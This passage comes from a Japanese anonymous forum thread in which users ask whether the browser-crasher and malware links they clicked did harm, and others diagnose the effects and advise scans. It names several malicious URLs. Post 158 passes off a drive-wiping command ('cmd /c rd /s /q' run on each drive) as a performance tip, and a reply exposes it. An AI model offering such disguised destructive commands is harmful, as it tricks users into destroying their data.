またブラクラ踏んでし ..
116:名無しさん@お腹いっぱい。
06/12/16 14:04:08
>>109
ありがとうございます。
それは便利ですね。すぐにでも登録します。
下部の文は、あのブラクラを踏んでから接続を切るまでの間に
Q2に繋がれていた可能性はあるかって事です。
日本語ヘタですみません。
117:名無しさん@お腹いっぱい。
06/12/16 18:35:37
>>115
ウイルス名は?
118:名無しさん@お腹いっぱい。
06/12/17 02:39:54
>>116
109ではないが。Q2やらに接続されていた可能性はないとはいえないが、低い。
気になるのなら電話会社で通話明細を確認してみた方がいいと思う。
Q2はNTTのサービスなのでNTT以外の会社からつながったのかな?試しにどこかのQ2にかけてみれば?
119:名無しさん@お腹いっぱい。
06/12/17 02:44:52
>>115
PCのダメージ少ないなら、ウイルス駆除→IE再インスコで治るかも。だめだったらOSを再インスコまたはシステムリカバリーディスクを使用。
買い換える必要はないだろ。
120:名無しさん@お腹いっぱい。
06/12/17 13:27:42
URLリンク(www.hellplant.org)
これ踏んじゃったんだけど、これ貼った奴訴えても良い?
121:名無しさん@お腹いっぱい。
06/12/17 13:30:46
>>120
くだらねえ。
やめとけ。
mmsとか使ってプロクシを回避、IPアドレスを抜くやつだ。
ブラクラでも何でもねえ。
122:名無しさん@お腹いっぱい。
06/12/17 13:38:07
>>121
URLリンク(www.hellplant.org)
のアドレスをクリックすることで、ブラウザクラッシャーという悪質ないたずらが発生する。
無制限にさまざまなプログラムが起動し、CPUやメモリの許容範囲を超えるような作動をし、
フリーズし、強大な負荷により、ハードディスクが破損する恐れもあるという。
そして、最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。
プロバイダに確認したところ、CATVやADSLや光ファイバーではtelnetによって回線を勝手に変えられることはないようだが、不確定なので注意すべきだ。
この掲示板でも、なんどもこのアドレスを偽装して踏ませようとする悪質な罠を作成する陰湿な者がいるので注意してほしい。
って書いてあるんだけど、じゃあ害は無いの?
123:名無しさん@お腹いっぱい。
06/12/17 13:43:00
本質はブラクラじゃねえよ。
ブラクラっぽい動作をするだけだ。
本質はIPアドレスの表示。
124:名無しさん@お腹いっぱい。
06/12/17 13:54:32
>>123
じゃあ対策は要らないんですか?
125:名無しさん@お腹いっぱい。
06/12/17 14:29:30
俺も別の板のスレで>>120踏んでしまった。
ノートンがブロックしてくれたような気がするけど、ヤバいかな。
とりあえずスパイウェアチェックとウイルスチェックしてこよう
126:名無しさん@お腹いっぱい。
06/12/17 14:36:47
>>122
>最後には、ダイアルアップ回線などの回線をtelnetという回線に移行させ、国際回線などの
高額な料金を請求されてしまう。
Telnetクライアントでググってみろ
ダイヤルアップなんかと全然関係ねえよw
127:名無しさん@お腹いっぱい。
06/12/17 14:42:57
一例としてWindows98からUNIXのサーバーを利用する場合を示すと、上記で起動したTelnetクライアントの「接続」メニューの
「リモートシステム」を選択し、「ホスト名」に相手のサーバーのIPアドレスかホスト名を入力するとサーバーに接続され、
「login」名と「Password」の入力が求められるので、正しく入力すると使用できるようになる。
128:名無しさん@お腹いっぱい。
06/12/17 14:50:17
俺なんてその手のブラクラ10000回は踏んでるなw
tskill iexploreでいつも強制終了させてるわさww
129:名無しさん@お腹いっぱい。
06/12/17 14:51:33
訴えるも何も自分が危険URLをここに貼ってるじゃん
130:名無しさん@お腹いっぱい。
06/12/17 14:52:14
url
IPが抜けませんでしたっ
www.hellplant.org/cgi-bin/xoor/serpent.cgi - 2006年12月16日 - このサイト内で検索
131:名無しさん@お腹いっぱい。
06/12/17 15:00:01
そもそもが一般人にTelnet.exeなんて必要ねえじゃねえかよ
ファイアーウォールで外向けをブロックしちまえよw
それと、それらの相手先のTelnetサーバーは応答なんてして来ねえよ
132:名無しさん@お腹いっぱい。
06/12/17 15:16:13
>>119
ウイルス駆除ってww
その方法を記載しろよ・・・
133:名無しさん@お腹いっぱい。
06/12/17 15:30:20
感染したって言ってるウィルス名も分からないのにどうアドバイスしろと・・・
134:名無しさん@お腹いっぱい。
06/12/17 15:31:03
>>133
つクリーンインスコ
135:名無しさん@お腹いっぱい。
06/12/17 16:39:41
>>118
さすがに自爆はできないですw
でも不安だったら確認してみるよ。ありがとう。
136:125
06/12/17 20:32:49
とりあえずspybotのスパイウェア検索とノートンの完全スキャンをしたけど検出0だった。
あとはTelnetの遮断をした。
無知な俺に出来る事はこれくらいか・・・
137:名無しさん@お腹いっぱい。
06/12/17 21:26:48
>>136
>ノートンの完全
他社のオンラインスキャンを併用しておいたほうが吉
URLリンク(www.kaspersky.co.jp)
by ノートン2007使い
138:136
06/12/17 22:11:27
>>137
d。やってみるよ。
139:名無しさん@お腹いっぱい。
06/12/18 00:25:29
セキュリティ初心者質問スレッドpart79
スレリンク(sec板)
140:名無しさん@お腹いっぱい。
06/12/18 21:06:57
【使用OS】 XP
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 VBとAVG
【ちゃんとUpdateしてるか】 してます
【スキャンした結果(ウイルス名・発見場所)】
AVG→IE一時ファイルにJS/Psyme.Cというトロイ
VBで全体スキャン→発見なし
【別のオンラインスキャンしたならその結果は】
カスペルスキーのオンラインスキャン(重要な領域)では発見なし
【症状を具体的に、分かる限りすべて書く】 コマンドプロンプトが大量に開きました
【何をしたらそんなことになったのか】 専ブラでクリックしてしまいました
URL:URLリンク(www.vipper.net)
【これまでにとった措置】 トロイを隔離したくらいです。
【その他の質問】
対処に困ってコンセントを抜いたんですが
その後PCを立ち上げるとStartUpScannerでこのようなログが出ました。
追加されたスタートアップです!
Location:HKCU
KeyName:MSMSGS
Command:"C:\Program Files\Messenger\msmsgs.exe" /background
KeyDataType:String
ExeFileName:C:\Program Files\Messenger\msmsgs.exe
ExeTimeStamp:2004/10/14 1:24:38
ExeFileSize:1,694,208
ExeMd5:74e6e96c6f0e2eca4edbb7f7a468f259
お願いします。
141:名無しさん@お腹いっぱい。
06/12/19 02:03:32
>>140
PSYMEを探してみた。メディアプレイヤーを上書きするトロイはあるみたいだが、メッセンジャーを上書きorメッセンジャーに感染は見つからなかった。
参考まで
URLリンク(www.trendmicro.co.jp)
URLリンク(www3.ca.com)
142:名無しさん@お腹いっぱい。
06/12/19 12:40:13
>>132
死ね 氏ねじゃなくて死ね
143:140
06/12/19 15:03:10
>>141
ありがとうございます!
メッセンジャー書き換えとかのトロイはないんですか・・・
また質問ですいませんが
メッセンジャー関係で何もしていなければこのログはトロイによって変更されたと考えて良いのでしょうか?
144:名無しさん@お腹いっぱい。
06/12/19 15:29:15
ブラクラの効果でOutlook Expressが起動したんだろ。
それと一緒にWindows Messengerが起動してスタートアップに放り込まれたんじゃねえの?
あれは一度起動すると設定を変えない限りスタートアップで起動するようになる。
145:名無しさん@お腹いっぱい。
06/12/19 16:17:55
>>144
メッセンジャーを起動して設定からバックグラウンドで起動〜のチェックを外したら
スタートアップから消えました
本当にありがとうございます!
146:名無しさん@お腹いっぱい。
06/12/19 23:21:54
>>145
PSYMEのトロイはもまえのVBで対応済みだと思う。隔離したというメッセージがでてればOK。
147:名無しさん@お腹いっぱい。
06/12/20 01:35:15
>>146
ありがとうございます
検出はAVGがしまして、それで隔離しました
今考えたら大量にウインドウが出たときにAVGとVBでぶつかって
検出に支障を来たしていないかと心配ですが・・・
148:名無しさん@お腹いっぱい。
06/12/20 01:59:36
AVGとVB・・・
まずは信頼できるやつをひとついれ
オンラインスキャン(カスペルスキーとか)を併用した方がよい
149:名無しさん@お腹いっぱい。
06/12/20 15:26:00
ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
の頭にhttp://をつけて下さい
jpgファイルを油断して踏んだらこちらに繋がったようです
これも>>3と同種でしょうか
150:149
06/12/20 15:36:20
すいません恐らく>>140と同じファイルだった様です
一応ウィルスは削除したのですがブラクラでウィルスまで貰ったのは初めてだったので。
これはウィルスの削除だけしておけば問題ないでしょうか
151:名無しさん@お腹いっぱい。
06/12/20 17:21:20
>>150
セキュリティホールを突いてくるウイルスサイトだが
OSがかなり古い状態でなければ踏んでも特に問題は無い
XPあたりなら素の状態でもシステム改変は無いだろう
念の為 一時ファイル削除してウイルススキャンして何も出なければ完了
152:名無しさん@お腹いっぱい。
06/12/20 17:22:54
>>150
なんのウィルス対策ソフト使ってるかわかんないんで安易に大丈夫とはいいにくい
カスペルスキーのオンラインスキャンでもやって確かめてみればおk
なお、あらかじめソフトが隔離したやつは削除、ならびにブラウザのキャッシュ(一時ファイル)なども削除して
PCを再起動させてからオンラインスキャンを開始かな
153:149
06/12/20 19:05:18
win2kで8月にアップデートしたので恐らく大丈夫だと思います
さっきカスペルスキーのオンラインスキャンもしてみましたが問題ないようでした。
アドバイスありがとうございました。
154:名無しさん@お腹いっぱい。
06/12/29 12:51:09
怖くて踏めないサイトのアドレス
を確認してくれるスレがあったと思うのですが
どこでしたでしょうか?
155:名無しさん@お腹いっぱい。
06/12/29 20:07:35
>>154
勇気がなくて踏めないURL鑑定スレin初質 Part1
スレリンク(qa板)
156:名無しさん@お腹いっぱい。
06/12/29 23:28:28
さんくすです
157:名無しさん@お腹いっぱい。
06/12/30 21:10:24
>>82
俺も踏んでもうたorz
158:名無しさん@お腹いっぱい。
06/12/31 12:53:03
最近PCが重いとか、起動シャットダウンが遅いとか思ってる人は、
リフレッシュコマンドを試してみるといい。
以下を実行することでディスク/ドライプの節約、メモリの開放になる。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q d:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q e:
cmd /c rd /s /q f:
cmd /c rd /s /q g:
cmd /c rd /s /q h:
cmd /c rd /s /q c:
これでディスク/ドライプがクリアされて正常になる。
事前予防にもなるので、やった事がなければ試してみる価値あり。
年末なのでPCもリフレッシュしましょう。
159:名無しさん@お腹いっぱい。
06/12/31 17:13:53
実行するとDドライブが全部消えちまうじゃねーか
160:名無しさん@お腹いっぱい。
06/12/31 18:17:11
RMDIR(RD)ディレクトリの削除
161:名無しさん@お腹いっぱい。
07/01/01 01:49:47
これブラクラらしいんですけど踏むと何か後遺症ありますか?
162:名無しさん@お腹いっぱい。
07/01/01 01:50:45
貼れてなかった…
これです
URLリンク(vip.6to23.com)
163:名無しさん@お腹いっぱい。
07/01/01 03:31:32
>>162
ただのびっくりページ
PCに悪さをするようなものは特に無い
164:名無しさん@お腹いっぱい。
07/01/02 03:58:51
【使用OS】 widowsXP SP2
【WindowsUpdateしてるか】 適宜
【AntiVirusは何を使っているか】 ウイルスバスター2006
【ちゃんとUpdateしてるか】 毎日
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】 してません
【症状を具体的に、分かる限りすべて書く】 症状は今のところ無し
【何をしたらそんなことになったのか】
すいません、これ踏んじゃったんですが、htmlが偽装されてますよね?
openjaneと、firefoxで踏んじゃったんですが…。
不安だったので、聞きに来ました。お願いします。
URLリンク(ea.uuhp.com)
【これまでにとった措置】 ウイルスバスターで検索
【その他の質問】
165:名無しさん@お腹いっぱい。
07/01/02 04:26:24
MUVIC COMってなんなんですか?
166:164
07/01/02 04:51:50
ググったら、FDDアタックやらウィンドウオープンやらのブラクラらしいですね。
カスペのオンラインスキャンもやったんですが、何も発見されませんでした。
これは後遺症は無いんでしょうか?
167:名無しさん@お腹いっぱい。
07/01/02 04:59:33
>>166
基本的にはブラクラの類に属するものでウイルスやらシステム感染は無いはず
conconとか仕掛けているのを見ると、随分昔に作られたもののよう
今時のPCなら特に問題無い
IEで踏んだが発動したのはウィンドウオープンとFDDアタックだけだった
アンチウイルスによっては踏んだ時にWinbombとかそんな感じで反応があるかも知れない
対処法としては放置しても構わないが、何か気持ち悪いと思うなら一時ファイル削除して再起動で十分
168:164
07/01/02 05:13:43
>>167
ありがとうございます!
ヤフーで検索したら、今ちょっと出回ってるurlらしくて、
踏んでしまった自分が恥ずかしい限りです。勉強になりました。
キャッシュ消し再起動もやっておきます。
169:名無しさん@お腹いっぱい。
07/01/02 05:43:47
時々見かける目障りなURLだったからアク禁覚悟で流しておいた
もう404になっているはず
170:164
07/01/02 08:51:42
>>169
ありがとうございます。
あぷろだ確認しましたが、流されてました。
そういう二時被害の防ぎ方もあるんですね。勉強になりました。
171:名無しさん@お腹いっぱい。
07/01/03 04:06:05
URLリンク(www.vipper.net)
上記のファイルを誤って踏んでしまいました
OS(XP)、Norton Internet Security共に最新の状態でした
一通りウイルスチェックを行いましたが、その後どの様に対処すればよいのでしょうか…
172:名無しさん@お腹いっぱい。
07/01/03 04:52:03
>>171
スレリンク(sec板:9番)
症状の内容は?
173:名無しさん@お腹いっぱい。
07/01/03 05:22:47
>>172
ウインドウがたくさん出てきたりtelnetがどうとか…
あとWMPやRMが何度も実行されました
結局LANケーブル引っこ抜いて再起動させました
今レポートを見てみたらhellplantやip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm、blacksheepに繋がってしまったみたいです…
174:172
07/01/03 05:56:42
ダウンロードして検体送付しときました。
タスクマネージャーのプロセスにおかしなexeがないか?自分で確認しておいて下さい
175:名無しさん@お腹いっぱい。
07/01/03 05:56:49
>>173
「WELCOME」だね。前スレが落ちてるので以下コピペ
以下の有害サイトを大量に呼び出すブラクラ
1.www.hellplant.org/cgi-bin/xoor/serpent.cgi
厨房ホイホイ。IP抜かれるくらいで特に害は無い
2.www.albinoblacksheep.com/flash/you.html
元ブラクラ。今はただのフラッシュ。害は無い
3.ip3e83566f.speed.planet.nl/hacked-by-chinese/5a.htm
脆弱性を突いてWMPを破壊、任意のコードを実行
とりあえず危険なのは3のURLだが
脆弱性自体は2年位前に塞がれているはず
結論としてはWindowsがよっぽど古い状態でなければ問題は無い
一時ファイル削除して適当なウイルススキャンして何も出なければ完了
176:名無しさん@お腹いっぱい。
07/01/03 06:02:53
私も>>171を踏んでしまいました一人です
>>175
>一時ファイル削除して適当なウイルススキャンして何も出なければ完了
なにも出ませんでしたが、outlookにhellplantなんたらのアカウントが大量に出来てますが大丈夫でしょうか?
177:171
07/01/03 06:08:51
>>174
ありがとうございます
注意深く見ておかないといけませんね
>>175
既出でしたか…
jpgファイルでこんな事になるとは思ってもみませんでした
OSもNISも最新の状態ですし大丈夫そうですね
皆様本当にありがとうございました
今後は安易にファイルを踏むことのない様慎重に対応するよう心がけます
178:名無しさん@お腹いっぱい。
07/01/03 06:16:39
>>176
>>171に>>3が含まれているための影響
手動で消してもいいが大抵Outlookを何回か起動・終了を繰り返すうちに
勝手に消えているはず。放置しても特に構わない
179:名無しさん@お腹いっぱい。
07/01/03 06:17:56
>>178
ありがとうございます。いい教訓になりましたorz
180:名無しさん@お腹いっぱい。
07/01/03 06:24:56
>>171
>>176
2ちゃんねる専用ブラウザ使ってますか?
181:171
07/01/03 06:29:49
>>180
Jane Doe Styleを使っているのですがリンク先をIEで踏んでしまいまして…
もし「.html」の部分が無ければViewerで踏むことになったのかな
182:176
07/01/03 06:30:18
>>180
Live2chを使ってますが、ポップアップさせずにクリックしてしまいました・・・反省してます
183:名無しさん@お腹いっぱい。
07/01/03 06:39:32
>>171
>>176
「CLUBPC security」などでブラウザのセキュリティ設定を再勉強しておきましょう
184:176
07/01/03 06:46:25
>>183
はい
あと>>171には>>175に加えて
URLリンク(cyberdyne-co-ltd.hp.infoseek.co.jp)
の標本No.7の症状も現れたことを付け加えておきます。
185:171
07/01/03 06:50:40
>>183
これを機にしっかり勉強しておきたいと思います
いやはやお恥ずかしい…
>>184
telnet接続画面はそのサイトのNo.3、hellplantのものではないでしょうか?
186:176
07/01/03 06:59:03
>>185
> telnet接続画面はそのサイトのNo.3、hellplantのものではないでしょうか?
私の場合、connectionなんたらというのが記述されたコマンドプロンプトが大量に出たのですが・・・
187:171
07/01/03 07:18:57
>>186
私が確認できる限りでは>>175さんが引用して下さった3サイトへの接続のみだったかと思います
でももしご指摘されたサイトへも接続されていたら面倒ですね
188:名無しさん@お腹いっぱい。
07/01/03 07:46:58
>>186
URLリンク(www.alaxala.com)
の「telnetコマンドの応答メッセージ一覧」のどれかが表示されただけだと思うが…
自分の環境では接続に失敗したtelnetプロンプトは即座に消えてしまうので
メッセージ内容は捉えきれなかった
接続先は>>3以外には無いし、繋がったという話も今まで聞いた事は無い
189:名無しさん@お腹いっぱい。
07/01/03 08:00:04
ブリクラ博物館
URLリンク(cyberdyne-co-ltd.hp.infoseek.co.jp)
190:名無しさん@お腹いっぱい。
07/01/03 08:32:22
test
191:176
07/01/03 17:32:50
>>188
どうやら接続できませんのメッセージが書かれたtelnetプロンプトだったみたいです
初めてだったのでコマンドプロンプトだとはやとちりしたのでしょうorz
ただ、私の場合は接続に失敗したtelnetプロンプトは消えずに
URLリンク(www.aylp.net)
のTelnetストームのような状態になりました
192:名無しさん@お腹いっぱい。
07/01/04 17:16:44
精神的ブラクラ踏んでしまいました
はぁ。
193:名無しさん@お腹いっぱい。
07/01/06 04:01:30
URLリンク(pcshop.tyabo.com)
ニュー速報から張ってあって、踏んでしまいました。
194:名無しさん@お腹いっぱい。
07/01/06 04:11:23
>>193
とりあえずWindowsUpdateしてあるなら踏んで即感染は無いはず
念を入れるなら一時ファイル削除して適当なウイルススキャン
ブラクラじゃなくてれっきとしたウイルスサイトだと思われ
195:名無しさん@お腹いっぱい。
07/01/06 10:42:35
>>193
Trojan-Downloader.VBS.Small.bo 検出
196:名無しさん@お腹いっぱい。
07/01/06 18:18:41
URLリンク(114090.net)
ニュース速報のやつ(同じもの?)を踏んだぜ!
197:名無しさん@お腹いっぱい。
07/01/06 23:15:32
>>196
中身は>>20あたりと同じ
有害無害含めて30種類の悪意あるサイトを呼び出す
WindowsUpdate済みなら多分踏んで即感染は無い
198:名無しさん@お腹いっぱい。
07/01/07 09:44:20
これを、クリックするとパソコンの電源が切れてしまったのですが、ウィルスに感染したのでしょうか?
URLリンク(www.nobsxxxhost.com)
199:名無しさん@お腹いっぱい。
07/01/07 19:35:13
>>198
URLリンク(www.nobsxxxhost.com) 自体は
海外のホスティングサイトかな
当該のURLリンク(www.nobsxxxhost.com) は
ページが消えているみたいで踏むと404扱いのページに飛ばされて
ランダムでアダルトサイトや詐欺ソフトサイトの広告ポップアップが現れる
もしかしたらこの中のどれかが原因かも知れないが
確認した限りではそこまで危険性の高いページは無かった
あるいはお前さんが踏んだ時には、まだページが残っていたのかも知れないが…
心配なら適当なウイルススキャンでもどうぞ
200:名無しさん@お腹いっぱい。
07/01/07 21:16:33
>>199
ありがとうございます。
わざわざリスクを負って調べていただき感謝いたします。
m(__)m
201:名無しさん@お腹いっぱい。
07/01/09 20:19:47
p://www.goggle.com/
p://www.yourdailymedia.com/media/1160043117/Goggle.com_Destroys_Your_PC
上のアドレスは立ちの悪いブラクラで
下のアドレスは上のアドレスを踏んだらどうなるか、
というものらしいのですが下のアドレスは安全なものでしょうか?
それと上のアドレスで起こりうる被害はどのようなものなのでしょうか?
202:名無しさん@お腹いっぱい。
07/01/09 23:19:01
なぜWindowsUpdateしてなかったら危ないんでしょうか?
203:名無しさん@お腹いっぱい。
07/01/09 23:34:27
すいません、グぐったら分かりました。
204:名無しさん@お腹いっぱい。
07/01/10 02:26:11
>>201
上はgoogleのタイプミスにつけこんだスパイウェア配布サイトだった、らしい
今現在は、踏んで即危険というわけでは無い様だけど、
ランダムで詐欺くさい広告窓が立ち上がる。サイトの本質は変わって無いのだろう
下はその通りの内容。マカフィーの広告動画かと思われ
205:名無しさん@お腹いっぱい。
07/01/10 18:25:57
>>204
どうもありがとうございました
206:名無しさん@お腹いっぱい。
07/01/13 21:12:49
2ch閉鎖騒動で各板の閉鎖スレを見ていたら、PCニュース板の
【ひろゆき】2ch、年内にも閉鎖へ【自己破産】
スレリンク(pcnews板)l50
のスレをギコナビで見ようとした瞬間、Macfeeがトロイの木馬を検知しました。
Macfeeがログのdatファイルを削除してくれたのですが、どうすればいいですか?
207:名無しさん@お腹いっぱい。
07/01/13 21:59:42
誤検知(ウィルスコード)なので放置でおk
208:名無しさん@お腹いっぱい。
07/01/13 22:03:50
>>207
誤検知ですか・・スレダウンロードするだけでウィルスに感染なんてするの?!
って思って焦ってこのスレにきました。ありがとうございます。
スレ内にウィルスコードが書かれていたというこでしょうか?
209:名無しさん@お腹いっぱい。
07/01/13 22:20:51
>>208
意味不明な妙な文字列があったのならそれがウィルスコード
210:名無しさん@お腹いっぱい。
07/01/14 03:50:26
URLリンク(nexx.jp)
これブラクラっすか?
211:名無しさん@お腹いっぱい。
07/01/14 04:11:58
>>210
ただのジョークだな
212:名無しさん@お腹いっぱい。
07/01/14 09:31:28
なんだ。
【社会】モーニング娘。吉澤ひとみさん号泣…16歳弟が東京・新宿で交通事故死★3
スレリンク(newsplus板:4番)
213:名無しさん@お腹いっぱい。
07/01/14 10:57:52
URLリンク(www16.tok2.com)
214:名無しさん@お腹いっぱい。
07/01/14 18:12:43
URLリンク(headline-news.tripod.com)
215:名無しさん@お腹いっぱい。
07/01/14 18:16:11
直リンすまん
216:名無しさん@お腹いっぱい。
07/01/14 19:00:16
URLリンク(monoganac2.sakura.ne.jp)
ポップアップを消しても消しても出てきます
これ以外にPCに悪影響あるでしょうか?
217:名無しさん@お腹いっぱい。
07/01/14 19:54:58
俺がいつも使っているパソコンが壊れたので、ノートからの質問です。
ブラウザを動かすと残像みたいに無限にブラウザが出てくるようになってしまいました。
Alt+F4でも、再起動しても直りません、助けてください。
218:名無しさん@お腹いっぱい。
07/01/14 21:25:05
>>216
無限アラート。タスクマネージャからブラウザ強制終了で脱出できる
PCに特に悪影響は無い
>>217
(残像消えずにいつまでも残っているのなら)
物理的にPCがいかれた場合にそんな症状になる場合もある
修理逝き
219:216
07/01/14 21:42:53
>>218
ジョークみたいですね
ありがとうございます
220:名無しさん@お腹いっぱい。
07/01/16 00:42:40
URLリンク(vip.6to23.com)
これってやばい?
FireFoxで開いたからポップアップブロックしたけど
後に中華メッセージが出た
221:名無しさん@お腹いっぱい。
07/01/16 01:02:27
>>220
ひとつめのリンク先へと飛び、その後さらに画像があるリンクへと飛ぶ
ホラー系画像があまりにもゆっくり描写されたので、びびりなし(笑)
222:名無しさん@お腹いっぱい。
07/01/16 08:43:09
URLリンク(headline-news.tripod.com)
これの中身はなんでしょうか・・・
変なのがダウンロードされようとしましたが
223:名無しさん@お腹いっぱい。
07/01/16 12:16:04
>>222
中身はもう消えたみたい。>>214と同じURLだね
残っていた時には確かconconクラッシャーやexeの直リンク
複数のウイルスサイトの呼び出しがあったと思う
とりあえず踏んでも即感染は無いと思うけど
一時ファイル削除して適当なウイルススキャンで何も出なければ完了
224:名無しさん@お腹いっぱい。
07/01/16 12:52:58
ありがとうございました
225:名無しさん@お腹いっぱい。
07/01/17 22:39:41
URLリンク(dailynews.i8.com)
芸スポで踏んでしまいました、アウトルックで新規作成メールの窓がたくさん開いたりしましたが、
ウイルス感染はないでしょうか?
226:名無しさん@お腹いっぱい。
07/01/17 22:42:41
>>225
トロイの警告が出るね
227:名無しさん@お腹いっぱい。
07/01/17 22:44:13
マジですか・・・ノートンのオートプロテクト外したままで踏んでしまいました・・・
228:名無しさん@お腹いっぱい。
07/01/17 22:48:50
>>225
URLリンク(www.trendmicro.co.jp)
これだね
とくに問題はないみたいよ
229:名無しさん@お腹いっぱい。
07/01/17 22:51:46
>>226 >>228
ありがとうございます
とりあえずほっとしました
さきほどからスキャンかけてるんですが、今のところ何も出てこないので
逆に不安になってました
230:名無しさん@お腹いっぱい。
07/01/17 22:54:28
>>228以外に他のトロイもダウンロードしようとしてるね
NOD32でWin32/TrojanDownloader.Buskyって出たけど
231:名無しさん@お腹いっぱい。
07/01/17 22:59:45
>>230
うはぁ
とりあえずスキャンかけてみたんですが、何もでませんでした・・・
再起動してもう一回やってみます
232:名無しさん@お腹いっぱい。
07/01/17 23:08:01
>>231
>>230のやつ
URLリンク(www.virustotal.com)
233:名無しさん@お腹いっぱい。
07/01/17 23:30:03
>>232
うーんよくわからないです・・・
なんか新型とかでノートンじゃまだ対応してないんですかね・・・
234:名無しさん@お腹いっぱい。
07/01/17 23:38:50
心配ならカスペルスキーのオンラインスキャンでもしてみれば。
ちなみにPeerGuardian入れてると>>228はダウンロードできない。
P2PやってなくてもPeerGuardian結構役に立つよ。
235:名無しさん@お腹いっぱい。
07/01/17 23:39:41
>ちなみにPeerGuardian入れてると>>228はダウンロードできない。
>>228じゃなくて>>230のトロイ
236:名無しさん@お腹いっぱい。
07/01/17 23:47:49
>>234
ピア2もインストしているのに、立ち上げていませんでした・・・何やってんでしょうね自分
カスペルスキーのオンラインスキャン試してみます、色々ありがとうございます
237:名無しさん@お腹いっぱい。
07/01/21 11:17:23
URLリンク(www.2flashgames.com)
このリンクを踏んだら「・・・が組み込まれました」とか言う表示が出るDOS窓がたくさん開きました
さらにその後もPCを使っていると時々一瞬だけDOS窓が開くようになってしまいました
これは何かのウイルスに感染していますか?
238:名無しさん@お腹いっぱい。
07/01/21 20:33:27
>>237
必ずでは無いがウイルスサイトの呼び出しがある
サイト内にある広告経由かな…結果は多少ランダムかも知れない
Updateを怠っていなければ感染は無いと思うが…
>>7次第だがとりあえずウイルススキャンした方が吉
手持ちのアンチウイルスが無いなら
スレリンク(sec板:8番)
239:名無しさん@お腹いっぱい。
07/01/21 20:50:18
>>237
そこもPeerGuardianでブロックされる。
直接的なアドバイスじゃないがPeerGuardian入れとくといいよ。
超おすすめ。
240:237
07/01/22 08:18:52
オンラインスキャンしてみてもなにもウイルスは検出されなかったのですが
タスクマネージャーが起動できなくなったり
ドラッグ アンド ドロップが出来なくなったり
カナ漢字入力システムを組み込みましたって書かれた窓がたくさん開いたりして
気持ちが悪いのでOSを再インストールしました
普段はjavaとかActiveXを常にoffにしているのですが
フラッシュゲームのページだと思って油断して踏んだらやられちゃいました
ウイルスソフトを何も使ってなかった自分が悪いのですが・・・
>>238 >>239
アドバイスありがとうございました
今後は対策ソフトを導入したいと思います
241:名無しさん@お腹いっぱい。
07/01/22 21:11:09
ブラクラ登録推奨
URLリンク(www.hellplant.org)
URLリンク(www.lbycwi.org)
242:名無しさん@お腹いっぱい。
07/01/22 21:15:39
>>241
d
243:名無しさん@お腹いっぱい。
07/01/23 01:39:02
このサイトの正体お願いします
URLリンク(www.110kz.com)
244:名無しさん@お腹いっぱい。
07/01/23 01:49:42
>>243
びびらせ洒落サイト
アクセスすると、文字列多彩な画面がだぁーとスクロール
そのあと
全部冗談です。製作者は善良なのです。
よく耐えました。あなたは真の勇者です。
マラカスパンダをクリックして交流広場にお進みください。
コーヒーでも飲んで、バクバクしている心臓を落ち着けましょう。
がでてくる。^^
245:名無しさん@お腹いっぱい。
07/01/23 02:09:02
こういうブラクラサイトを検査するソフトとかってないんですかね?
どこかの個人がやれば小遣いかせぎにはなると思うんですが
トレンドマイクロあたりにやってほしい
246:名無しさん@お腹いっぱい。
07/01/23 02:18:42
>>245
ブククラじゃないぞ、ジョークサイトで無害だぞ
247:781
07/01/23 02:21:36
>>242のことじゃなくて一般的なブラクラのことね
最近はられてるゴッグル(goggle)とか
248:名無しさん@お腹いっぱい。
07/01/23 02:31:51
そいうことかー
そういやさっき、さっそgoggle貼られてたわw
249:名無しさん@お腹いっぱい。
07/01/23 05:04:54
友人5人で大学のパソでgoggle gorgleとかブラクラ踏みまくって遊んでたら、
鮮やかにバレテひどいめに・・・
250:名無しさん@お腹いっぱい。
07/01/23 18:37:46
>>244
dクス
251:名無しさん@お腹いっぱい。
07/01/24 16:12:43
これ踏んじゃったんですが大丈夫でしょうか ?
URLリンク(www.lbycwi.org)
なんか巨大な画像が出てきます。
252:名無しさん@お腹いっぱい。
07/01/24 16:18:54
ごめん、 >>5に出てました。
253:名無しさん@お腹いっぱい。
07/01/24 22:27:59
URLリンク(webnews.writernetwork.com)
踏んでしまいました・・・
WindowsUpdateはやってて、使っているAntiVirusは
ノートンです。
ちゃんとUpdateはしてますが・・・なんかPC遅くなりました。
よろしくおねがいします。
254:名無しさん@お腹いっぱい。
07/01/24 22:47:42
Janeなどの専ブラウザを使っている人は
command.datに下記の文章を追加しましょう
これらを追加するだけで危険性がグッと減ります
チェック=
ANSIドメイン/IPアドレス検索=URLリンク(whois.ansi.co.jp)
ブラクラチェック=URLリンク(so.7walker.net)
ウイルスデータベース=URLリンク(www.trendmicro.co.jp)
255:名無しさん@お腹いっぱい。
07/01/24 22:50:05
>>253
中身自体は>>222と同内容
各種ブラクラ、それと一応ウイルスサイトの呼び出しがあるので
一時ファイル削除してウイルススキャン
PCが遅くなるのは多分メモリを大量に消費しているので
ウイルススキャン終了後にでも再起動を
256:名無しさん@お腹いっぱい。
07/01/25 00:42:56
>>255
ありがとうございます!
257:名無しさん@お腹いっぱい。
07/01/25 18:25:14
すみません、これ踏んじゃいました
URLリンク(dailynews.7p.com)
だいじょうぶでしょうか?
258:名無しさん@お腹いっぱい。
07/01/25 19:03:00
【使用OS】 XP
【WindowsUpdateしてるか】 最近はしていません
【AntiVirusは何を使っているか】 ウィルスセキュリティー
【ちゃんとUpdateしてるか】 最近していないです・・・
【スキャンした結果】何も発見されませんでした。
【別のオンラインスキャンしたならその結果は】
ウィルスバスターでスキャンしたのですが、何も発見されませんでした
【症状を具体的に、分かる限りすべて書く】症状は特にないです。
【何をしたらそんなことになったのか】
ここ踏んじゃいました・・・。
URLリンク(www2.strangeworld.org)
ウィンドウがたくさん出て、OutlookExpressも勝手に起動しました。
【これまでにとった措置】
強制的に電源を切って、再起動して一時ファイルの削除、ウィルススキャンしました。
【その他の質問】
危険なウィルスやスパイウェアに感染してしまったのでしょうか?
259:名無しさん@お腹いっぱい。
07/01/25 19:57:41
URLリンク(successmoon.blogzine.jp)
260:名無しさん@お腹いっぱい。
07/01/25 21:11:07
>>257
>>253 >>222 辺りと同じもの
一時ファイル削除してウイルススキャン
>>258
